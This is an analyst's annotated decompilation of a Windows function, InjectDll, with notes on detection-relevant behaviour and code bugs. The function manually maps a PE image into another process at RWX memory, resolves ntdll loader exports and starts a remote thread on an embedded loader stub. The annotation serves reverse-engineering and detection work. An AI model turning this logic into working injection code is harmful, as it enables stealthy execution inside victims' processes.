- /*
-  * Analyst annotation of Hex-Rays pseudo-C (not compilable as-is; the
-  * sub_* / unk_* names are unresolved addresses from the decompiler).
-  *
-  * InjectDll: copies a PE image that is already readable in this process
-  * (lpAddress) into the target process (hProcess) at a fresh RWX
-  * allocation, writes a parameter block plus an embedded loader stub, and
-  * starts a remote thread on the stub. The stub itself is not visible in
-  * this listing; the parameter block it receives (image base, base-reloc
-  * and import directory RVAs, four ntdll loader exports) suggests it does
-  * relocation and import resolution remotely -- not confirmed here.
-  *
-  * Two paths are selected by IMAGE_FILE_HEADER.Machine: 0x8664 (AMD64)
-  * uses the sub_* helpers with an extra high-dword argument (presumably
-  * 64-bit-aware wrappers for a 32-bit host -- unconfirmed), anything else
-  * uses plain Win32 APIs.
-  *
-  * Returns 1 on success, 0 on any failure (return type is char).
-  *
-  * Detection-relevant behaviour visible below: VirtualAllocEx with
-  * PAGE_EXECUTE_READWRITE sized from SizeOfImage, WriteProcessMemory of
-  * headers and each section, GetProcAddress/LdrLoadDll-style resolution of
-  * ntdll loader exports, and remote thread creation via RtlCreateUserThread
-  * (or CreateRemoteThread when dwMajorVersion <= 5).
-  *
-  * NOTE(review): no VirtualFree / free appears on any failure path, so the
-  * local stub copy, the parameter block and both remote allocations are
-  * leaked when a later step returns 0.
-  */
- char __cdecl InjectDll(HANDLE hProcess, LPCVOID lpAddress)
- {
- __int64 v3; // rax
- __int64 v4; // rax
- __int64 v5; // kr00_8
- __int64 v6; // rax
- _DWORD *v7; // edx
- __int64 v8; // rax
- __int64 v9; // rax
- __int64 v10; // rax
- __int64 v11; // rax
- __int64 v12; // rax
- HMODULE v13; // eax
- FARPROC v14; // [esp+Ch] [ebp-29Ch]
- FARPROC v15; // [esp+10h] [ebp-298h]
- FARPROC v16; // [esp+14h] [ebp-294h]
- FARPROC v17; // [esp+18h] [ebp-290h]
- __int64 v18; // [esp+1Ch] [ebp-28Ch]
- __int64 v19; // [esp+24h] [ebp-284h]
- __int64 v20; // [esp+2Ch] [ebp-27Ch]
- __int64 v21; // [esp+34h] [ebp-274h]
- LPCVOID v22; // [esp+3Ch] [ebp-26Ch]
- bool v23; // [esp+43h] [ebp-265h]
- struct _MEMORY_BASIC_INFORMATION v24; // [esp+44h] [ebp-264h]
- SIZE_T v25; // [esp+60h] [ebp-248h]
- bool v26; // [esp+67h] [ebp-241h]
- struct _MEMORY_BASIC_INFORMATION v27; // [esp+68h] [ebp-240h]
- SIZE_T v28; // [esp+84h] [ebp-224h]
- bool v29; // [esp+8Bh] [ebp-21Dh]
- struct _MEMORY_BASIC_INFORMATION v30; // [esp+8Ch] [ebp-21Ch]
- SIZE_T v31; // [esp+A8h] [ebp-200h]
- unsigned int v32; // [esp+ACh] [ebp-1FCh]
- char *v33; // [esp+B0h] [ebp-1F8h]
- unsigned int v34; // [esp+B4h] [ebp-1F4h]
- void *v35; // [esp+B8h] [ebp-1F0h]
- char v36; // [esp+BFh] [ebp-1E9h]
- struct _MEMORY_BASIC_INFORMATION Buffer; // [esp+C0h] [ebp-1E8h]
- SIZE_T v38; // [esp+DCh] [ebp-1CCh]
- char v39; // [esp+E0h] [ebp-1C8h]
- HANDLE v40; // [esp+E8h] [ebp-1C0h] -- remote thread handle from RtlCreateUserThread (32-bit path)
- int v41; // [esp+ECh] [ebp-1BCh] -- NTSTATUS from RtlCreateUserThread (32-bit path)
- FARPROC v42; // [esp+F0h] [ebp-1B8h] -- RtlCreateUserThread; see NOTE(review) at its call site
- unsigned __int16 j; // [esp+F4h] [ebp-1B4h]
- struct _OSVERSIONINFOW VersionInformation; // [esp+F8h] [ebp-1B0h]
- LPCVOID lpBuffer; // [esp+218h] [ebp-90h] -- local 28-byte parameter block (32-bit path)
- unsigned int i; // [esp+21Ch] [ebp-8Ch]
- __int64 v47; // [esp+220h] [ebp-88h]
- __int64 hObject; // [esp+238h] [ebp-70h] -- read after the 64-bit thread-create call but never assigned in this listing (decompiler artifact; presumably filled through a pointer argument not shown)
- LPCVOID v49; // [esp+244h] [ebp-64h] -- local 56-byte parameter block (64-bit path)
- __int64 hModule; // [esp+248h] [ebp-60h]
- char *v51; // [esp+250h] [ebp-58h] -- IMAGE_NT_HEADERS64 of the source image
- DWORD flOldProtect; // [esp+254h] [ebp-54h]
- int v53; // [esp+258h] [ebp-50h]
- int v54; // [esp+25Ch] [ebp-4Ch]
- char v55; // [esp+267h] [ebp-41h] -- 1 when Machine == IMAGE_FILE_MACHINE_AMD64
- __int64 v56; // [esp+268h] [ebp-40h] -- size in bytes of the embedded loader stub
- unsigned __int16 *v57; // [esp+270h] [ebp-38h]
- bool v58; // [esp+277h] [ebp-31h] -- VirtualProtectEx result; never read afterwards
- _DWORD *v59; // [esp+278h] [ebp-30h]
- char v60; // [esp+27Fh] [ebp-29h]
- __int64 nSize; // [esp+280h] [ebp-28h] -- size of the parameter block written ahead of the stub (56 for PE32+, 28 for PE32)
- LPCVOID v62; // [esp+28Ch] [ebp-1Ch] -- local copy of the loader stub
- char *v63; // [esp+290h] [ebp-18h] -- first IMAGE_SECTION_HEADER
- char *v64; // [esp+294h] [ebp-14h] -- IMAGE_NT_HEADERS32 of the source image
- __int64 lpBaseAddress; // [esp+298h] [ebp-10h] -- remote image base
- __int64 lpParameter; // [esp+2A0h] [ebp-8h] -- remote parameter block; the stub is written at lpParameter + nSize
- // Defaults: failure result (v60 == 0) and zeroed remote pointers.
- v60 = 0;
- v55 = 0;
- v58 = 0;
- flOldProtect = 0;
- hModule = 0i64;
- v53 = 0;
- v54 = 0;
- lpBaseAddress = 0i64;
- lpParameter = 0i64;
- v56 = 0i64;
- nSize = 0i64;
- v62 = 0;
- if ( !hProcess )
- return v60;
- // Readability probe on the source image: 0x1C == sizeof(MEMORY_BASIC_INFORMATION) on x86;
- // reject PAGE_NOACCESS (0x1) and PAGE_GUARD (0x100) pages.
- v38 = VirtualQuery(lpAddress, &Buffer, 0x1Cu);
- if ( v38 )
- v36 = Buffer.Protect & 1 ? 0 : (Buffer.Protect & 0x100) == 0;
- else
- v36 = 0;
- if ( !v36 )
- return v60;
- v59 = lpAddress;
- // 23117 == 0x5A4D == IMAGE_DOS_SIGNATURE ("MZ").
- if ( *(_WORD *)lpAddress != 23117 )
- return 0;
- // v59[15] is IMAGE_DOS_HEADER.e_lfanew (+0x3C); +4 skips the PE signature to IMAGE_FILE_HEADER.Machine.
- v57 = (unsigned __int16 *)((char *)lpAddress + v59[15] + 4);
- // 34404 == 0x8664 == IMAGE_FILE_MACHINE_AMD64.
- if ( *v57 == 34404 )
- v55 = 1;
- if ( v55 )
- {
- // PE32+ image.
- sub_10001000(); // purpose not visible in this listing
- v56 = 1088i64; // 64-bit loader stub size (bytes copied from unk_10025530)
- nSize = 56i64; // parameter block: 7 x 8-byte slots
- v34 = 1088;
- // 0x441 == 1089 bytes, MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_READWRITE (4): local staging copy of the stub.
- v35 = VirtualAlloc(0, 0x441u, 0x3000u, 4u);
- if ( v35 && v35 && &unk_10025530 && v34 ) // duplicated conditions are an artifact of an inlined copy helper
- qmemcpy(v35, &unk_10025530, v34);
- v62 = v35;
- v51 = (char *)lpAddress + v59[15];
- // *((_DWORD *)v51 + 20) is NT headers +80 == OptionalHeader.SizeOfImage.
- // 12288 == 0x3000 == MEM_COMMIT|MEM_RESERVE, 64 == 0x40 == PAGE_EXECUTE_READWRITE.
- // sub_10001B70 has the VirtualAllocEx argument shape plus a high dword and returns a 64-bit
- // address -- presumably a 64-bit-aware allocation wrapper (unconfirmed).
- LODWORD(v3) = sub_10001B70(hProcess, 0, 0, *((_DWORD *)v51 + 20), 12288, 64);
- lpBaseAddress = v3;
- // Second remote allocation holds the parameter block followed by the stub.
- LODWORD(v4) = sub_10001B70(hProcess, 0, 0, nSize + v56, 12288, 64);
- lpParameter = v4;
- }
- else
- {
- // PE32 image.
- v56 = 13839i64; // 32-bit loader stub size
- nSize = 28i64; // parameter block: 7 x 4-byte slots
- v32 = 13839;
- // 0x3610 == 13840 bytes, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE.
- v33 = (char *)VirtualAlloc(0, 0x3610u, 0x3000u, 4u);
- // "éá" is the decompiler's rendering of the embedded binary stub, not a real string.
- if ( v33 && v33 && "éá" && v32 )
- qmemcpy(v33, "éá", v32);
- v62 = v33;
- v64 = (char *)lpAddress + v59[15];
- // *((_DWORD *)v64 + 20) is NT headers +80 == OptionalHeader.SizeOfImage; RWX allocation in the target.
- lpBaseAddress = (signed int)VirtualAllocEx(hProcess, 0, *((_DWORD *)v64 + 20), 0x3000u, 0x40u);
- lpParameter = (signed int)VirtualAllocEx(hProcess, 0, nSize + v56, 0x3000u, 0x40u);
- }
- // Both remote allocations are required; nothing allocated so far is released on failure.
- if ( !lpBaseAddress || !lpParameter )
- return 0;
- v63 = 0;
- if ( v55 )
- {
- // 264 == sizeof(IMAGE_NT_HEADERS64): v63 is the first IMAGE_SECTION_HEADER.
- v63 = v51 + 264;
- // *((_DWORD *)v51 + 21) is NT headers +84 == OptionalHeader.SizeOfHeaders.
- // sub_10001D20 has the WriteProcessMemory argument shape plus a high dword (presumably a 64-bit
- // write wrapper; unconfirmed) -- copies the PE headers to the remote image base.
- if ( !sub_10001D20(hProcess, lpBaseAddress, HIDWORD(lpBaseAddress), lpAddress, *((_DWORD *)v51 + 21), 0) )
- return 0;
- // *((unsigned __int16 *)v51 + 3) is NT headers +6 == IMAGE_FILE_HEADER.NumberOfSections;
- // 40 == sizeof(IMAGE_SECTION_HEADER); +12 VirtualAddress, +16 SizeOfRawData, +20 PointerToRawData.
- for ( i = 0; i < *((unsigned __int16 *)v51 + 3); ++i )
- {
- if ( *(_DWORD *)&v63[40 * i + 16] ) // skip sections with no raw data
- {
- v5 = lpBaseAddress + *(unsigned int *)&v63[40 * i + 12];
- if ( !sub_10001D20(
- hProcess,
- v5,
- HIDWORD(v5),
- (char *)lpAddress + *(_DWORD *)&v63[40 * i + 20],
- *(_DWORD *)&v63[40 * i + 16],
- 0) )
- return 0;
- }
- }
- // Local 56-byte parameter block (sub_10013750 is presumably an allocator -- unconfirmed),
- // probed for readability the same way as the source image above.
- v49 = (LPCVOID)sub_10013750(56);
- v31 = VirtualQuery(v49, &v30, 0x1Cu);
- if ( v31 )
- {
- if ( v30.Protect & 1 )
- v29 = 0;
- else
- v29 = (v30.Protect & 0x100) == 0;
- }
- else
- {
- v29 = 0;
- }
- if ( !v29 )
- return 0;
- // Module lookup for ntdll yielding a 64-bit base (helper semantics not visible here).
- LODWORD(v6) = sub_10001390(L"ntdll.dll");
- hModule = v6;
- if ( !v6 )
- return 0;
- // Parameter block layout (8-byte slots):
- //   [0] remote image base
- //   [1] base + NT headers +176 == DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
- //   [2] base + NT headers +144 == DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
- //   [3..6] LdrLoadDll, LdrGetProcedureAddress, RtlInitAnsiString, RtlCreateUnicodeStringFromAsciiz
- v7 = v49;
- *(_DWORD *)v49 = lpBaseAddress;
- v7[1] = HIDWORD(lpBaseAddress);
- *((_QWORD *)v49 + 1) = lpBaseAddress + *((unsigned int *)v51 + 44);
- *((_QWORD *)v49 + 2) = lpBaseAddress + *((unsigned int *)v51 + 36);
- // sub_10001AB0(module, module_hi, name) resolves an export from the 64-bit module (GetProcAddress shape).
- LODWORD(v8) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrLoadDll");
- v21 = v8;
- LODWORD(v8) = v49;
- *((_DWORD *)v49 + 6) = v21;
- *(_DWORD *)(v8 + 28) = HIDWORD(v21);
- if ( !v21 )
- return 0;
- LODWORD(v9) = sub_10001AB0(hModule, SHIDWORD(hModule), "LdrGetProcedureAddress");
- v20 = v9;
- LODWORD(v9) = v49;
- *((_DWORD *)v49 + 8) = v20;
- *(_DWORD *)(v9 + 36) = HIDWORD(v20);
- if ( !v20 )
- return 0;
- LODWORD(v10) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlInitAnsiString");
- v19 = v10;
- LODWORD(v10) = v49;
- *((_DWORD *)v49 + 10) = v19;
- *(_DWORD *)(v10 + 44) = HIDWORD(v19);
- if ( !v19 )
- return 0;
- LODWORD(v11) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUnicodeStringFromAsciiz");
- v18 = v11;
- LODWORD(v11) = v49;
- *((_DWORD *)v49 + 12) = v18;
- *(_DWORD *)(v11 + 52) = HIDWORD(v18);
- if ( !v18 )
- return 0;
- // Write the parameter block, then the stub immediately after it.
- if ( !sub_10001D20(hProcess, lpParameter, HIDWORD(lpParameter), v49, nSize, 0) )
- return 0;
- if ( !sub_10001D20(hProcess, nSize + lpParameter, (unsigned __int64)(nSize + lpParameter) >> 32, v62, v56, 0) )
- return 0;
- // VirtualProtectEx-shaped call: 32 == 0x20 == PAGE_EXECUTE_READ over 28 bytes.
- // NOTE(review): 28 is the PE32 block size although this path wrote 56 bytes (moot at page
- // granularity), and the result in v58 is never checked.
- v58 = sub_10001C50(hProcess, lpParameter, HIDWORD(lpParameter), 28, 32, &flOldProtect) != 0;
- LODWORD(v12) = sub_10001AB0(hModule, SHIDWORD(hModule), "RtlCreateUserThread");
- v47 = v12;
- if ( !v12 )
- return 0;
- // Remote thread start through sub_10001040 (64-bit call helper; the literal 10 plausibly is an
- // argument count -- unconfirmed). hObject is not assigned anywhere in this listing.
- if ( (signed int)sub_10001040(v47, SHIDWORD(v47), 10) >= 0 && hObject )
- CloseHandle((HANDLE)hObject);
- }
- else
- {
- // 248 == sizeof(IMAGE_NT_HEADERS32): v63 is the first IMAGE_SECTION_HEADER.
- v63 = v64 + 248;
- // *((_DWORD *)v64 + 21) is NT headers +84 == OptionalHeader.SizeOfHeaders.
- if ( !WriteProcessMemory(hProcess, (LPVOID)lpBaseAddress, lpAddress, *((_DWORD *)v64 + 21), 0) )
- return 0;
- // Same per-section copy as the 64-bit path: raw data -> base + VirtualAddress.
- for ( j = 0; j < (signed int)*((unsigned __int16 *)v64 + 3); ++j )
- {
- if ( *(_DWORD *)&v63[40 * j + 16]
- && !WriteProcessMemory(
- hProcess,
- (LPVOID)(*(_DWORD *)&v63[40 * j + 12] + lpBaseAddress),
- (char *)lpAddress + *(_DWORD *)&v63[40 * j + 20],
- *(_DWORD *)&v63[40 * j + 16],
- 0) )
- {
- return 0;
- }
- }
- // Local 28-byte parameter block, readability-probed as above.
- lpBuffer = (LPCVOID)sub_10013750(28);
- v28 = VirtualQuery(lpBuffer, &v27, 0x1Cu);
- if ( v28 )
- {
- if ( v27.Protect & 1 )
- v26 = 0;
- else
- v26 = (v27.Protect & 0x100) == 0;
- }
- else
- {
- v26 = 0;
- }
- if ( !v26 )
- return 0;
- v13 = GetModuleHandleW(L"ntdll.dll");
- hModule = (signed int)v13;
- if ( !v13 )
- return 0;
- // Parameter block layout (4-byte slots):
- //   [0] remote image base
- //   [1] base + NT headers +160 == DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress
- //   [2] base + NT headers +128 == DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress
- //   [3..6] LdrLoadDll, LdrGetProcedureAddress, RtlInitAnsiString, RtlCreateUnicodeStringFromAsciiz
- *(_DWORD *)lpBuffer = lpBaseAddress;
- *((_DWORD *)lpBuffer + 1) = lpBaseAddress + *((_DWORD *)v64 + 40);
- *((_DWORD *)lpBuffer + 2) = lpBaseAddress + *((_DWORD *)v64 + 32);
- v17 = GetProcAddress((HMODULE)hModule, "LdrLoadDll");
- *((_DWORD *)lpBuffer + 3) = v17;
- if ( !v17 )
- return 0;
- v16 = GetProcAddress((HMODULE)hModule, "LdrGetProcedureAddress");
- *((_DWORD *)lpBuffer + 4) = v16;
- if ( !v16 )
- return 0;
- v15 = GetProcAddress((HMODULE)hModule, "RtlInitAnsiString");
- *((_DWORD *)lpBuffer + 5) = v15;
- if ( !v15 )
- return 0;
- v14 = GetProcAddress((HMODULE)hModule, "RtlCreateUnicodeStringFromAsciiz");
- *((_DWORD *)lpBuffer + 6) = v14;
- if ( !v14 )
- return 0;
- // Write the parameter block, then the stub immediately after it.
- if ( !WriteProcessMemory(hProcess, (LPVOID)lpParameter, lpBuffer, nSize, 0) )
- return 0;
- if ( !WriteProcessMemory(hProcess, (LPVOID)(nSize + lpParameter), v62, v56, 0) )
- return 0;
- // 0x1C bytes -> PAGE_EXECUTE_READ (0x20). NOTE(review): the result in v58 is never checked.
- v58 = VirtualProtectEx(hProcess, (LPVOID)lpParameter, 0x1Cu, 0x20u, &flOldProtect) != 0;
- // VirtualQuery on a stack struct followed by a 0x9C-byte memset is an artifact of an inlined
- // zeroing helper; 0x9C does not match the 284 (sizeof(OSVERSIONINFOEXW)) set just below.
- v22 = &VersionInformation;
- v25 = VirtualQuery(&VersionInformation, &v24, 0x1Cu);
- if ( v25 )
- {
- if ( v24.Protect & 1 )
- v23 = 0;
- else
- v23 = (v24.Protect & 0x100) == 0;
- }
- else
- {
- v23 = 0;
- }
- if ( v23 )
- memset((void *)v22, 0, 0x9Cu);
- VersionInformation.dwOSVersionInfoSize = 284;
- GetVersionExW(&VersionInformation);
- // dwMajorVersion > 5 (Vista and later): start the stub with RtlCreateUserThread.
- if ( VersionInformation.dwMajorVersion > 5 )
- {
- // NOTE(review): unlike every other GetProcAddress result in this function, v42 is called
- // without a NULL check; a missing export would call address 0.
- v42 = GetProcAddress((HMODULE)hModule, "RtlCreateUserThread");
- // RtlCreateUserThread(ProcessHandle, SecurityDescriptor, CreateSuspended, StackZeroBits,
- //   StackReserve, StackCommit, StartAddress, Parameter, ThreadHandle, ClientId):
- //   StartAddress = stub (lpParameter + nSize), Parameter = parameter block (lpParameter).
- v41 = ((int (__cdecl *)(HANDLE, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, HANDLE *, char *))v42)(
- hProcess,
- 0,
- 0,
- 0,
- 0,
- 0,
- nSize + lpParameter,
- lpParameter,
- &v40,
- &v39);
- if ( v41 < 0 ) // NTSTATUS failure
- return 0;
- if ( v40 )
- CloseHandle(v40);
- }
- // Pre-Vista fallback: same start address / parameter via CreateRemoteThread.
- else if ( !CreateRemoteThread(
- hProcess,
- 0,
- 0,
- (LPTHREAD_START_ROUTINE)(nSize + lpParameter),
- (LPVOID)lpParameter,
- 0,
- 0) )
- {
- return 0;
- }
- }
- return 1;
- }